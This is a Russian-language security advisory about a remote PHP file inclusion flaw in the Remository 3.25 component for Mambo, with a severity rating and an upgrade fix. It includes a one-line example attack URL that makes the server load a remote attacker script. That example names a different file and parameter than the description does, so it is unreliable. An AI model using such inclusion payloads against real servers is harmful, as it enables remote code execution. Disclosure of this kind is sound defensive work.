PHP-инклюдинг в Mambo Remository

Дата публикации:
18.08.2006
Всего просмотров:
4229
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Remository 3.x (компонент к Mambo)
Уязвимые версии: Remository (компонент Mambo) 3.25, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии admin.remository.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/

URL производителя: www.remository.com

Решение: Установите последнюю версию (3.26) с сайта производителя.

Ссылки: Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability

или введите имя

CAPTCHA